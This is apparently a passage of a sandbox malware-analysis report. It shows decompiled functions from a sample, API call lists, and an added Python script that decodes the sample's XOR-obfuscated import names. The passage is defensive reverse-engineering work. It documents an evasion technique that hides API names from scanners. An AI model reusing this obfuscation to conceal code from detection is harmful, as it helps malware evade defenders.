    								goto L5;
    							} else {
    								_push(0);
    								_push(_t29);
    								_t16 = E012C32D9(__ebx, __edx, _t25, _t29, _t33);
    								_push(__edx);
    								_t17 = E012F1263(_t16, _t29);
    								 *(_t29 + 4) =  *(_t29 + 4) | 0xffffffff; // second field of the block set to -1
    								 *_t29 = _t17; // first field = result of E012F1263
    								_t9 = 1;
    							}
    						}
    					}
    				}
    				return _t9;
    			}

    APIs
    • RtlEncodePointer.NTDLL ref: 012C3626
    • RtlEncodePointer.NTDLL ref: 012C3633
    • RtlEncodePointer.NTDLL ref: 012C3640
    • RtlEncodePointer.NTDLL ref: 012C364D
    • RtlDecodePointer.NTDLL(Function_00003420,00000000), ref: 012C366E
      • Part of subcall function 012C8FD6: Sleep.KERNEL32(00000000), ref: 012C8FFE
    • RtlDecodePointer.NTDLL(00000000), ref: 012C369D
      • Part of subcall function 012C329C: TlsFree.KERNEL32(00000016), ref: 012C32C7
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 97%
    			// Runtime import resolution with XOR-encoded stack strings. Each name is
    			// stored as immediates, decoded in place by a short XOR loop with its own
    			// one-byte key, passed to GetProcAddress and then stored in the table at
    			// *0x12e5974 (offsets 0, 4, 8, 0xc, 0x10). Decoded from the constants
    			// below: module L"SHLWAPI"; imports PathFileExistsW, PathFindFileNameW,
    			// StrCmpIW, StrRChrW and StrStrIW (all shlwapi.dll exports).
    			E012D58AB() {
    				struct HINSTANCE__* _v8;
    				char _v11;
    				intOrPtr _v15;
    				intOrPtr _v19;
    				char _v20;
    				char _v23;
    				intOrPtr _v27;
    				intOrPtr _v31;
    				char _v32;
    				char _v35;
    				intOrPtr _v39;
    				intOrPtr _v43;
    				char _v44;
    				char _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				char _v68;
    				short _v70;
    				short _v72;
    				short _v74;
    				short _v76;
    				short _v78;
    				short _v80;
    				short _v82;
    				char _v84;
    				char _v86;
    				intOrPtr _v90;
    				intOrPtr _v94;
    				intOrPtr _v98;
    				intOrPtr _v102;
    				char _v104;
    				void* __ebx;
    				void* __ebp;
    				struct HINSTANCE__* _t89;
    				void* _t91;
    				_Unknown_base(*)()* _t93;
    				void* _t94;
    				_Unknown_base(*)()* _t96;
    				void* _t97;
    				_Unknown_base(*)()* _t99;
    				void* _t100;
    				_Unknown_base(*)()* _t102;
    				void* _t103;
    				_Unknown_base(*)()* _t105;
    				signed int _t117;
    				_Unknown_base(*)()** _t119;
    				void* _t123;
    
    				// UTF-16 stack string, key 0xa4: decodes to L"SHLWAPI"
    				_v70 = 0xa4; // terminator (0xa4 ^ 0xa4 = 0)
    				_v72 = 0xed; // 'I'
    				_v74 = 0xf4; // 'P'
    				_v76 = 0xe5; // 'A'
    				_v78 = 0xf3; // 'W'
    				_v80 = 0xe8; // 'L'
    				_v82 = 0xec; // 'H'
    				_t119 =  *0x12e5974; // 0x892da0: table that receives the resolved pointers
    				_v84 = 0xf7; // 'S'
    				_v68 = 0;    // flag byte written before and after each decode loop
    				_t117 = 0;
    				do {
    					 *(_t123 + _t117 * 2 - 0x50) =  *(_t123 + _t117 * 2 - 0x50) ^ 0x000000a4; // 8 UTF-16 units, low byte only
    					_t117 = _t117 + 1;
    					_t125 = _t117 - 8;
    				} while (_t117 < 8);
    				_push( &_v84);
    				_v68 = 1;
    				_push(0);
    				_t89 = E01342753( &_v84, 0, _t125); // presumably loads the module by name; the result is used as hModule below (body not shown in this report)
    				_v8 = _t89;
    				if(_t89 == 0) {
    					L19:
    					__eflags = 0;
    					return 0;
    				}
    				// 16-byte stack string, key 0xaa: "PathFileExistsW"
    				_v52 = 0xaafdd9de; // "tsW\0"
    				_v56 = 0xd9c3d2ef; // "Exis"
    				_v60 = 0xcfc6c3ec; // "File"
    				_v64 = 0xc2decbfa; // "Path"
    				_v48 = 0;
    				_t91 = 0;
    				do {
    					 *(_t123 + _t91 - 0x3c) =  *(_t123 + _t91 - 0x3c) ^ 0x000000aa;
    					_t91 = _t91 + 1;
    				} while (_t91 < 0x10);
    				_v48 = 1;
    				_t93 = GetProcAddress(_v8,  &_v64); // executed: PathFileExistsW
    				 *_t119 = _t93;
    				// 18-byte stack string, key 0xae: "PathFindFileNameW"
    				_v90 = 0xaef9cbc3; // "meW\0"
    				_v94 = 0xcfe0cbc2; // "leNa"
    				_v98 = 0xc7e8cac0; // "ndFi"
    				_v102 = 0xc7e8c6da; // "thFi"
    				_v104 = 0xcffe; // "Pa"
    				_v86 = 0;
    				_t94 = 0;
    				do {
    					 *(_t123 + _t94 - 0x64) =  *(_t123 + _t94 - 0x64) ^ 0x000000ae;
    					_t94 = _t94 + 1;
    				} while (_t94 < 0x12);
    				_v86 = 1;
    				_t96 = GetProcAddress(_v8,  &_v104); // executed: PathFindFileNameW
    				 *(_t119 + 4) = _t96;
    				// 9-byte stack string, key 0xb1: "StrCmpIW"
    				_v15 = 0xb1e6f8c1; // "pIW\0"
    				_v19 = 0xdcf2c3c5; // "trCm"
    				_v20 = 0xe2; // 'S'
    				_v11 = 0;
    				_t97 = 0;
    				do {
    					 *(_t123 + _t97 - 0x10) =  *(_t123 + _t97 - 0x10) ^ 0x000000b1;
    					_t97 = _t97 + 1;
    				} while (_t97 < 9);
    				_v11 = 1;
    				_t99 = GetProcAddress(_v8,  &_v20); // executed: StrCmpIW
    				 *(_t119 + 8) = _t99;
    				// 9-byte stack string, key 0xb4: "StrRChrW"
    				_v27 = 0xb4e3c6dc; // "hrW\0"
    				_v31 = 0xf7e6c6c0; // "trRC"
    				_v32 = 0xe7; // 'S'
    				_v23 = 0;
    				_t100 = 0;
    				do {
    					 *(_t123 + _t100 - 0x1c) =  *(_t123 + _t100 - 0x1c) ^ 0x000000b4;
    					_t100 = _t100 + 1;
    				} while (_t100 < 9);
    				_v23 = 1;
    				_t102 = GetProcAddress(_v8,  &_v32); // executed: StrRChrW
    				 *(_t119 + 0xc) = _t102;
    				// 9-byte stack string, key 0xb7: "StrStrIW"
    				_v39 = 0xb7e0fec5; // "rIW\0"
    				_v43 = 0xc3e4c5c3; // "trSt"
    				_v44 = 0xe4; // 'S'
    				_v35 = 0;
    				_t103 = 0;
    				do {
    					 *(_t123 + _t103 - 0x28) =  *(_t123 + _t103 - 0x28) ^ 0x000000b7;
    					_t103 = _t103 + 1;
    				} while (_t103 < 9);
    				_v35 = 1;
    				_t105 = GetProcAddress(_v8,  &_v44); // executed: StrStrIW
    				 *(_t119 + 0x10) = _t105;
    				// Succeed only if all five imports resolved.
    				if( *_t119 == 0 ||  *(_t119 + 4) == 0 ||  *(_t119 + 8) == 0 ||  *(_t119 + 0xc) == 0 || _t105 == 0) {
    					goto L19;
    				} else {
    					return 1;
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(012D136C,000000AA,00000014,00000000,?,?,00000000), ref: 012D5960
    • GetProcAddress.KERNEL32(012D136C,000000AE), ref: 012D59A1
    • GetProcAddress.KERNEL32(012D136C,000000B1), ref: 012D59D3
    • GetProcAddress.KERNEL32(012D136C,000000B4), ref: 012D5A05
    • GetProcAddress.KERNEL32(012D136C,000000B7), ref: 012D5A37
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
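The XOR loops in E012D58AB, and the plaintext dword stores in the SHParseDisplayName routine at the top of this section, can be decoded mechanically from the immediates in the listing. The script below is an added example, not code from the sample or from Joe Sandbox: the (offset, value) pairs are copied from the `_vN = ...` lines, while the slot names and the `count` sanity check are ours. It recovers L"SHLWAPI", PathFileExistsW, PathFindFileNameW, StrCmpIW, StrRChrW, StrStrIW, SHParseDisplayName and SHGetSpecialFolderPathW.

```python
"""Decode the stack strings in E012D58AB and in the SHParseDisplayName /
SHGetSpecialFolderPathW routine from the immediates the decompiler prints.

Added example, not code from the sample or from Joe Sandbox. The (offset, value)
pairs are copied from the `_vN = ...` lines of the listing; slot names are ours.
"""
from typing import Dict, List, Optional, Tuple

Store = Tuple[int, int]  # (N from the decompiler's _vN, immediate value)


def _store_width(delta_to_next: int, value: int, min_width: int) -> int:
    """Size in bytes of one `_vN = imm` store.

    `_vN` is the local at ebp-N, so the gap to the next local is the store size.
    For the last store fall back to the smallest 1/2/4-byte width that holds
    the immediate (a 3-byte value such as 0x576874 means a dword store).
    """
    if delta_to_next:
        return delta_to_next
    needed = max(min_width, (value.bit_length() + 7) // 8)
    return 1 if needed == 1 else 2 if needed == 2 else 4


def decode_stack_string(locals_: List[Store], key: int = 0, stride: int = 1,
                        count: Optional[int] = None, wide: bool = False) -> str:
    """Rebuild one stack string.

    key:    one-byte XOR immediate of the decode loop (0 for plaintext strings)
    stride: step of that loop in bytes; 2 when it indexes `_tX * 2`. The XOR
            touches only the first byte of each stride-sized unit, which is
            what `xor word ptr [...], imm8` does to a UTF-16 string.
    count:  loop bound from the `while (_tX < n)` line; when given, the bytes
            the loop covers must equal the bytes stored, which catches a
            mis-copied offset or immediate.
    wide:   decode as UTF-16LE (one 16-bit store per character).
    """
    ordered = sorted(locals_, key=lambda store: -store[0])  # highest N = lowest address
    raw = bytearray()
    for i, (offset, imm) in enumerate(ordered):
        delta = offset - ordered[i + 1][0] if i + 1 < len(ordered) else 0
        width = _store_width(delta, imm, 2 if wide else 1)
        raw += imm.to_bytes(width, "little")  # OverflowError here means a wrong offset
    if count is not None and count * stride != len(raw):
        raise ValueError(f"loop covers {count * stride} bytes, stores cover {len(raw)}")
    for i in range(0, len(raw), stride):
        raw[i] ^= key
    text = raw.decode("utf-16-le" if wide else "latin-1", errors="replace")
    return text.split("\x00", 1)[0]


# Constants copied from the decompilation (slot = where the pointer ends up).
STACK_STRINGS: Dict[str, dict] = {
    # E012D58AB: 16-bit stores _v84.._v70, loop `_t117 * 2 - 0x50` x 8, key 0xa4
    "module": dict(locals_=[(84, 0xf7), (82, 0xec), (80, 0xe8), (78, 0xf3),
                            (76, 0xe5), (74, 0xf4), (72, 0xed), (70, 0xa4)],
                   key=0xa4, stride=2, count=8, wide=True),
    "table+0x00": dict(locals_=[(64, 0xc2decbfa), (60, 0xcfc6c3ec),
                                (56, 0xd9c3d2ef), (52, 0xaafdd9de)],
                       key=0xaa, count=0x10),
    "table+0x04": dict(locals_=[(104, 0xcffe), (102, 0xc7e8c6da), (98, 0xc7e8cac0),
                                (94, 0xcfe0cbc2), (90, 0xaef9cbc3)],
                       key=0xae, count=0x12),
    "table+0x08": dict(locals_=[(20, 0xe2), (19, 0xdcf2c3c5), (15, 0xb1e6f8c1)],
                       key=0xb1, count=9),
    "table+0x0c": dict(locals_=[(32, 0xe7), (31, 0xf7e6c6c0), (27, 0xb4e3c6dc)],
                       key=0xb4, count=9),
    "table+0x10": dict(locals_=[(44, 0xe4), (43, 0xc3e4c5c3), (39, 0xb7e0fec5)],
                       key=0xb7, count=9),
    # SHParseDisplayName routine: plaintext dword stores, no decode loop
    "esi+0x04": dict(locals_=[(64, 0x61504853), (60, 0x44657372), (56, 0x6c707369),
                              (52, 0x614e7961), (48, 0x656d), (46, 0)]),
    "esi+0x08": dict(locals_=[(88, 0x65474853), (84, 0x65705374), (80, 0x6c616963),
                              (76, 0x646c6f46), (72, 0x61507265), (68, 0x576874)]),
}


def decode_all() -> Dict[str, str]:
    """Decode every entry of STACK_STRINGS: slot -> recovered name."""
    return {slot: decode_stack_string(**spec) for slot, spec in STACK_STRINGS.items()}


if __name__ == "__main__":
    for slot, name in decode_all().items():
        print(f"{slot:12} {name}")
```

The store width comes from the gap between consecutive `_vN` offsets, so the whole `_vN` list has to be copied, not just the values. The `count` check is there for the usual transcription slip: the flag byte the sample writes right after each string (`_v48 = 0` / `_v48 = 1`) sits next to the string but outside the loop's range, and including it produces a length mismatch instead of a silently wrong name.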

    Control-flow Graph

    C-Code - Quality: 58%
    			// CRT entry point (WinMainCRTStartup pattern): validates the in-memory PE
    			// header at the image base 0x12c0000, initializes the runtime, picks the
    			// show-window value from STARTUPINFO and calls the program's WinMain
    			// (E012D1829). Everything before that call is compiler runtime; E012D1829
    			// is where the sample's own code starts.
    			E012C20FF(void* __ebx, void* __edx, void* __edi) {
    				void* _t18; // passed uninitialized below; decompiler artifact
    				intOrPtr _t20;
    				void* _t24;
    				intOrPtr _t25;
    				void* _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				intOrPtr _t31;
    				void* _t42; // __ebx pass-through, undeclared by the decompiler
    				intOrPtr _t43; // likewise
    				void* _t44;
    				signed int _t45;
    				void* _t48;
    				void* _t49; // __edi pass-through, undeclared by the decompiler
    				void* _t51;
    				intOrPtr _t52;
    				void* _t53;
    				void* _t56; void* _t57; void* _t58; void* _t59; // flag copies, undeclared by the decompiler
    
    				_t49 = __edi;
    				_t48 = __edx;
    				_t42 = __ebx;
    				_t52 =  *0x12e6b38; // 0x0
    				if(_t52 == 0) {
    					_push(0);
    					_push(0);
    					_push(1);
    					_push(0);
    					_push(__ebx);
    					E01373E20(_t18, __ebx, __edi, 0);
    				}
    				_t53 =  *0x12c0000 - 0x5a4d; // 0x5a4d: IMAGE_DOS_SIGNATURE "MZ" at the image base
    				if(_t53 == 0) {
    					_t20 =  *0x12c003c; // 0xf0: e_lfanew
    					__eflags =  *((intOrPtr*)(_t20 + 0x12c0000)) - 0x4550; // IMAGE_NT_SIGNATURE "PE"
    					if( *((intOrPtr*)(_t20 + 0x12c0000)) != 0x4550) {
    						goto L3;
    					} else {
    						_t43 = 0x10b; // IMAGE_NT_OPTIONAL_HDR32_MAGIC
    						__eflags =  *((intOrPtr*)(_t20 + 0x12c0018)) - 0x10b;
    						if( *((intOrPtr*)(_t20 + 0x12c0018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t20 + 0x12c0074)) - 0xe; // NumberOfRvaAndSizes > 14
    							if( *((intOrPtr*)(_t20 + 0x12c0074)) <= 0xe) {
    								goto L3;
    							} else {
    								// DataDirectory[14] (CLR header) non-zero => managed-image flag
    								__eflags =  *(_t20 + 0x12c00e8);
    								_t7 =  *(_t20 + 0x12c00e8) != 0;
    								__eflags = _t7;
    								_t43 = 0 | _t7;
    								 *(_t51 - 0x1c) = _t7;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t51 - 0x1c) = 0; // not a managed image
    				}
    				if(E012C22EB() == 0) {
    					E012C20C0(0x1c);
    					_pop(_t43);
    				}
    				if(E012C354F(_t49) == 0) {
    					E012C20C0(0x10);
    					_pop(_t43);
    				}
    				E012C8007();
    				 *((intOrPtr*)(_t51 - 4)) = 0;
    				_t24 = E012C7DC2(_t42, _t49); // executed
    				_t56 = _t24;
    				if(_t24 < 0) {
    					_t24 = E012C25D6(_t48, _t56);
    					_t43 = 0x1b;
    				}
    				_push(_t51); // executed
    				_t25 = E01370B3A(_t24, _t49); // executed
    				 *0x12e6b34 = _t25;
    				 *0x12e3240 = E012C7D2B(_t42, 0);
    				_t27 = E012C7C70(_t43);
    				_t57 = _t27;
    				if(_t27 < 0) {
    					E012C25D6(_t48, _t57);
    					_t43 = 8;
    				}
    				_t28 = E012C79FA(_t43, _t48, _t49);
    				_t58 = _t28;
    				if(_t28 < 0) {
    					_push(9);
    					E012C25D6(_t48, _t58);
    				}
    				_t29 = E012C23B5(_t49, 0, 1); // executed
    				_pop(_t44);
    				_t59 = _t29;
    				if(_t29 != 0) {
    					E012C25D6(_t48, _t59);
    					_t44 = _t29;
    				}
    				_t30 = E012C799B(_t44); // presumably the command line without the program name
    				if(( *(_t51 - 0x3c) & 0x00000001) == 0) { // STARTUPINFO.dwFlags & STARTF_USESHOWWINDOW
    					_t45 = 0xa; // SW_SHOWDEFAULT
    				} else {
    					_t45 =  *(_t51 - 0x38) & 0x0000ffff; // STARTUPINFO.wShowWindow
    				}
    				_push(_t45);
    				_push(_t30);
    				_t31 = E012D1829(0x12c0000, 0); // executed: WinMain(hInstance, NULL, lpCmdLine, nCmdShow)
    				 *((intOrPtr*)(_t51 - 0x20)) = _t31; // exit code
    				if( *(_t51 - 0x1c) == 0) {
    					E012C258C(_t31);
    				}
    				E012C25B8();
    				 *((intOrPtr*)(_t51 - 4)) = 0xfffffffe;
    				return E012C80A5( *((intOrPtr*)(_t51 - 0x20)));
    			}

    APIs
    • __RTC_Initialize.LIBCMT ref: 012C217F
    • __amsg_exit.LIBCMT ref: 012C2192
      • Part of subcall function 012C7C70: _parse_cmdline.LIBCMT ref: 012C7CC7
      • Part of subcall function 012C7C70: _parse_cmdline.LIBCMT ref: 012C7D08
    • __amsg_exit.LIBCMT ref: 012C21B8
      • Part of subcall function 012C79FA: _strlen.LIBCMT ref: 012C7A24
      • Part of subcall function 012C79FA: _strlen.LIBCMT ref: 012C7A55
    • __amsg_exit.LIBCMT ref: 012C21C9
      • Part of subcall function 012C23B5: __initterm_e.LIBCMT ref: 012C23EB
    • __amsg_exit.LIBCMT ref: 012C21DC
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 41%
    			E012C8704(void* __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __ebx;
    				void* __esi;
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr* _t14;
    				intOrPtr _t15;
    				void* _t18;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				void* _t22;
    				void* _t25;
    				void* _t27;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t34;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				intOrPtr* _t43;
    				intOrPtr* _t44;
    				void* _t48;
    
    				_t36 = __edx;
    				_t43 = _t42;
    				E01371FCC(_t11, _t27, _t43);
    				_t13 =  *_t43( *0x12e6b28, _t37, _t27, __ecx, _t48); // executed
    				_t28 = _t13;
    				_v8 = _t28;
    				_t14 =  *_t43( *0x12e6b24); // executed
    				_t44 = _t14;
    				if(_t44 < _t28) {
    					L12:
    					_t15 = 0;
    				} else {
    					_t40 = _t44 - _t28;
    					_t2 = _t40 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L12;
    					} else {
    						_t30 = E012CB067(_t28);
    						_t3 = _t40 + 4; // 0x4
    						_t18 = _t3;
    						if(_t30 >= _t18) {
    							E012F624A(_t30, _t44); // executed
    							_t20 =  *_t40(_t18, _a4); // executed
    							 *_t44 = _t20;
    							_t21 =  *_t40(_t44 + 4); // executed
    							 *0x12e6b24 = _t21;
    							_t15 = _a4;
    						} else {
    							_t22 = 0x800;
    							if(_t30 < 0x800) {
    								_t22 = _t30;
    							}
    							_t23 = _t22 + _t30;
    							if(_t22 + _t30 >= _t30) {
    								_t25 = E012C9022(_v8, _t23);
    								_pop(_t34);
    								if(_t25 != 0) {
    									L9:
    									_push(_t25);
    									return E013675EB(_t25, _t34, _t36);
    								}
    							}
    							_t5 = _t30 + 0x10; // 0x10
    							_t24 = _t5;
    							if(_t5 >= _t30) {
    								_t25 = E012C9022(_v8, _t24);
    								_pop(_t34);
    								if(_t25 != 0) {
    									goto L9;
    								}
    							}
    							goto L12;
    						}
    					}
    				}
    				return _t15;
    			}

    Instruction addresses covered by the listing above (per-line assembly column omitted): 0x012c8704 to 0x012c87b9

    APIs
    • RtlDecodePointer.NTDLL(?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C8719
    • RtlDecodePointer.NTDLL(?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C8726
      • Part of subcall function 012C9022: Sleep.KERNEL32(00000000,00000000,00000000,?,012C877E,00000000,00000010,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834), ref: 012C904C
    • RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C879F
    • RtlEncodePointer.NTDLL(-00000004,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C87A7
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 44%
    			E012D1539(void* __edx, void* __edi, void* __eflags) {
    				void* _t9;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t20;
    				void* _t21;
    
    				_t21 = __eflags;
    				_t18 = __edx;
    				_t9 = CreateThread(0, 0, E012CFA1A, 0, 0, _t20 - 8); // executed
    				CloseHandle(_t9);
    				_t12 = CreateThread(0, 0, E012CF9B1, 0, 0, _t20 - 8); // executed
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(_t18);
    				_t13 = E01370B1B(_t12, _t18, _t21);
    				 *0x12e2f0c = _t13; // executed
    				_t14 = CreateThread(0, 0, E012CFF4D, _t13, 0, _t20 - 8); // executed
    				 *0x12e2f10 = _t14;
    				_push( *((intOrPtr*)(_t20 + 0x14)));
    				_push( *((intOrPtr*)(_t20 + 0x10)));
    				_push( *((intOrPtr*)(_t20 + 0xc)));
    				_push( *((intOrPtr*)(_t20 + 8)));
    				return E012F6584(_t14);
    			}

    Instruction addresses covered by the listing above (per-line assembly column omitted): 0x012d1539 to 0x012d1819

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_0000FA1A,00000000,00000000,?), ref: 012D1548
    • CloseHandle.KERNEL32(00000000), ref: 012D154B
    • CreateThread.KERNEL32(00000000,00000000,Function_0000F9B1,00000000,00000000,?), ref: 012D155E
    • CreateThread.KERNEL32(00000000,00000000,Function_0000FF4D,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 012D157C
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph (rendered graph omitted; basic blocks span 12c79fa to 12c7c6f, entry block 12c79fa-12c7a01)
    C-Code - Quality: 79%
    			E012C79FA(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				void* __ebx;
    				void* __esi;
    				signed int _t50;
    				void* _t51;
    				signed int _t53;
    				void* _t54;
    				void* _t56;
    				signed int _t57;
    				void* _t58;
    				signed int* _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr* _t69;
    				void* _t81;
    				signed char _t83;
    				void* _t86;
    				void* _t91;
    				intOrPtr* _t94;
    				unsigned int _t96;
    				intOrPtr* _t102;
    				signed int _t103;
    				void* _t105;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t113;
    				intOrPtr* _t114;
    				void* _t119;
    
    				_t105 = __edi;
    				_t102 = __edx;
    				if( *0x12e6b2c == 0) {
    					_t50 = E012C2EFF(__ecx);
    				}
    				_t111 =  *0x12e3240; // 0x0
    				_push(_t105);
    				_t106 = 0;
    				if(_t111 != 0) {
    					while(1) {
    						_t51 =  *_t111;
    						if(_t51 == 0) {
    							break;
    						}
    						if(_t51 != 0x3d) {
    							_t106 = _t106 + 1;
    						}
    						_t111 = _t111 + E012C63C0(_t111) + 1;
    					}
    					_t50 = E012C8FD6(_t106 + 1, 4);
    					_t108 = _t50;
    					_pop(_t91);
    					 *0x12e3260 = _t108;
    					if(_t108 == 0) {
    						goto L3;
    					} else {
    						_t113 =  *0x12e3240; // 0x0
    						while( *_t113 != 0) {
    							_t54 = E012C63C0(_t113);
    							_pop(_t91);
    							_t3 = _t54 + 1; // 0x1
    							_t81 = _t3;
    							if( *_t113 == 0x3d) {
    								L14:
    								_t113 = _t113 + _t81;
    								continue;
    							} else {
    								_t56 = E012C8FD6(_t81, 1); // executed
    								_pop(_t91);
    								 *_t108 = _t56;
    								if(_t56 == 0) {
    									_t57 = E012C115B(_t91, _t102, _t113,  *0x12e3260);
    									 *0x12e3260 =  *0x12e3260 & 0x00000000;
    									_t53 = _t57 | 0xffffffff;
    									L17:
    									goto L18;
    								} else {
    									_t58 = E012C1CDF(_t56, _t81, _t113);
    									_t119 = _t119 + 0xc;
    									if(_t58 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										E012C38BA(_t81, _t108, _t113);
    										asm("int3");
    										_push(_t91);
    										_t94 = _v20;
    										_push(_t81);
    										_push(_t113);
    										 *_t108 = 0;
    										_t114 = _t102;
    										_t103 = _v24;
    										 *_t94 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t103;
    										}
    										_v8 = 0;
    										do {
    											if( *_t114 != 0x22) {
    												 *_t108 =  *_t108 + 1;
    												if(_t103 != 0) {
    													 *_t103 =  *_t114;
    													_a8 = _t103 + 1;
    												}
    												_t83 =  *_t114;
    												_t114 = _t114 + 1;
    												if(E012CB01C(_t83 & 0x000000ff) != 0) {
    													 *_t108 =  *_t108 + 1;
    													if(_a8 != 0) {
    														_a8 = _a8 + 1;
    														 *_a8 =  *_t114;
    													}
    													_t114 = _t114 + 1;
    												}
    												_t103 = _a8;
    												_t94 = _a12;
    												if(_t83 == 0) {
    													_t114 = _t114 - 1;
    												} else {
    													goto L33;
    												}
    											} else {
    												_t83 = 0x22;
    												_t114 = _t114 + 1;
    												_v8 = 0 | _v8 == 0x00000000;
    												goto L33;
    											}
    											L38:
    											_v8 = _v8 & 0x00000000;
    											L39:
    											while( *_t114 != 0) {
    												while(1) {
    													_t65 =  *_t114;
    													if(_t65 != 0x20 && _t65 != 9) {
    														break;
    													}
    													_t114 = _t114 + 1;
    												}
    												if( *_t114 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t103;
    													}
    													 *_t94 =  *_t94 + 1;
    													while(1) {
    														_t86 = 1;
    														_t96 = 0;
    														L50:
    														while( *_t114 == 0x5c) {
    															_t114 = _t114 + 1;
    															_t96 = _t96 + 1;
    														}
    														if( *_t114 == 0x22) {
    															if((_t96 & 0x00000001) == 0) {
    																if(_v8 == 0) {
    																	L56:
    																	_t86 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t69 = _t114 + 1;
    																	if( *_t69 != 0x22) {
    																		goto L56;
    																	} else {
    																		_t114 = _t69;
    																	}
    																}
    															}
    															_t96 = _t96 >> 1;
    														}
    														if(_t96 != 0) {
    															do {
    																_t96 = _t96 - 1;
    																if(_t103 != 0) {
    																	 *_t103 = 0x5c;
    																	_t103 = _t103 + 1;
    																}
    																 *_t108 =  *_t108 + 1;
    															} while (_t96 != 0);
    															_a8 = _t103;
    														}
    														_t66 =  *_t114;
    														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
    															if(_t86 != 0) {
    																_push(_t66);
    																if(_t103 == 0) {
    																	if(E012CB01C() != 0) {
    																		_t114 = _t114 + 1;
    																		 *_t108 =  *_t108 + 1;
    																	}
    																} else {
    																	if(E012CB01C() != 0) {
    																		_a8 = _a8 + 1;
    																		 *_a8 =  *_t114;
    																		_t114 = _t114 + 1;
    																		 *_t108 =  *_t108 + 1;
    																	}
    																	_a8 = _a8 + 1;
    																	 *_a8 =  *_t114;
    																}
    																 *_t108 =  *_t108 + 1;
